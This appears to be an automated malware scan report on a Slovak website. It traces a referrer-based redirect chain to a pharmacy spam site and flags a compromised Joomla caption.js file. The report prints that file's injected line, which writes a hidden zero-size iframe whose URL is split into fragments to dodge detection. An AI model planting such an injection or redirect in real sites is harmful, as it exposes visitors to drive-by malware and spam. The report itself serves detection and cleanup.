Malicious/Suspicious Redirects
Request 1
  URL: http://greencar.sk/ (imitation of visitor from search engine)
  GET / HTTP/1.1
  Host: greencar.sk
  Referer: http://www.google.com/search?q=redirect+check1
Server response
  HTTP/1.1 307 Temporary Redirect
  Connection: close
  Date: Tue, 02 Sep 2014 21:42:20 GMT
  Location: http://seotds.info/in.cgi?6&parameter=greencar.sk&ur=1&HTTP_REFERER=greencar.sk&googlekeywords=zovirax+cold+sore+cream+price&se=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dgreencar.sk%26source%3Dweb%26cd%3D1%26ved%3D0CDEQFjAG%26url%3Dhttp%3A%252F%252Fgreencar.sk%252F%26ei%3DwC7yT5qCJbCCkQKtnwE%26usg%3DAFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg
  Server: nginx
  Vary: User-Agent,Accept-Encoding
  Content-Length: 0
  Content-Type: text/html
  Set-Cookie: analytics=true; expires=Wed, 02-Sep-2015 21:42:20 GMT; path=/
Status: malicious

Request 2
  URL: http://seotds.info/in.cgi?6&parameter=greencar.sk&ur=1&HTTP_REFERER=greencar.sk&googlekeywords=zovirax+cold+sore+cream+price&se=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dgreencar.sk%26source%3Dweb%26cd%3D1%26ved%3D0CDEQFjAG%26url%3Dhttp%3A%252F%252Fgreencar.sk%252F%26ei%3DwC7yT5qCJbCCkQKtnwE%26usg%3DAFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg (imitation of visitor from search engine)
  GET /in.cgi?6&parameter=greencar.sk&ur=1&HTTP_REFERER=greencar.sk&googlekeywords=zovirax+cold+sore+cream+price&se=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dgreencar.sk%26source%3Dweb%26cd%3D1%26ved%3D0CDEQFjAG%26url%3Dhttp%3A%252F%252Fgreencar.sk%252F%26ei%3DwC7yT5qCJbCCkQKtnwE%26usg%3DAFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg HTTP/1.1
  Host: seotds.info
  Referer: http://www.google.com/search?q=redirect+check2
Server response
  HTTP/1.1 302 Found
  Connection: close
  Date: Tue, 02 Sep 2014 21:45:02 GMT
  Location: http://canadianthepills.com?6&parameter=greencar.sk&ur=1&HTTP_REFERER=greencar.sk&googlekeywords=zovirax+cold+sore+cream+price&se=http%253A%252F%252Fwww.google.com%252Furl%253Fsa%253Dt%2526rct%253Dj%2526q%253Dgreencar.sk%2526source%253Dweb%2526cd%253D1%2526ved%253D0CDEQFjAG%2526url%253Dhttp%253A%25252F%25252Fgreencar.sk%25252F%2526ei%253DwC7yT5qCJbCCkQKtnwE%2526usg%253DAFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg
  Server: nginx/1.0.15
  Content-Length: 687
  Content-Type: text/html; charset=iso-8859-1
Status: suspicious
Scanned pages/files
Request | Server response | Status |
http://greencar.sk/ | 200 OK Content-Length: 78679 Content-Type: text/html | clean |
http://greencar.sk/plugins/system/jcemediabox/js/mediaobject.js?v=1010 | 200 OK Content-Length: 3119 Content-Type: application/javascript | clean |
http://greencar.sk/plugins/system/jcemediabox/js/jcemediabox.js?v=1010 | 200 OK Content-Length: 42324 Content-Type: application/javascript | clean |
http://greencar.sk/plugins/system/jcemediabox/addons/default.js?v=1010 | 200 OK Content-Length: 1431 Content-Type: application/javascript | clean |
http://greencar.sk/plugins/system/jcemediabox/addons/twitter.js?v=1010 | 200 OK Content-Length: 461 Content-Type: application/javascript | clean |
http://greencar.sk/media/system/js/caption.js | 200 OK Content-Length: 2159 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):

    var JCaption = new Class({
        initialize: function(selector) {
            this.selector = selector;
            var images = $$(selector);
            images.each(function(image){ this.createCaption(image); }, this);
        },
        createCaption: function(element) {
            var caption = document.createTextNode(element.title);
            var container = document.createElement("div");
            var text = document.createElement("p");
            var width = element.getAttribute("width");
            var align = container.setAttribute("style","float:"+align);
            container.style.width = width + "px";
        }
    });
    document.caption = null;
    window.addEvent('load', function() {
        var caption = new JCaption('img.caption')
        document.caption = caption
    });
    // Injected line appended to the legitimate caption script: writes a hidden
    // 0x0 iframe whose URL is assembled from string fragments to evade simple
    // signature matching.
    document.write('<iframe src="'+'ht'+'tp://xn--80a'+'ko'+'qimq.xn--p1'+'ai/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');

Antivirus reports:
http://greencar.sk/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/javascript | clean |
http://greencar.sk/modules/mod_globalnews/scripts/slider.js | 200 OK Content-Length: 6615 Content-Type: application/javascript | clean |
http://greencar.sk/components/com_pollxt/script/json2.js | 200 OK Content-Length: 9834 Content-Type: application/javascript | clean |
http://greencar.sk/components/com_pollxt/script/pollxt.js | 200 OK Content-Length: 5725 Content-Type: application/javascript | clean |
http://greencar.sk//modules/mod_tpmenu/tpmenu/dropline/menu2.js.php?animated=Fx.Transitions.Bounce.easeOut/ | 200 OK Content-Length: 394 Content-Type: text/html | clean |
http://greencar.sk/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://greencar.sk/templates/magazine_plazza/scripts/js/js.gzip.php | 200 OK Content-Length: 5603 Content-Type: text/css | clean |
http://greencar.sk//modules/mod_bookmarkus/tmpl/bookmark_us.js/ | 404 Not Found Content-Length: 241 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21259 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=greencar.sk
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://greencar.sk/
Result: greencar.sk is not infected or malware details are not published yet.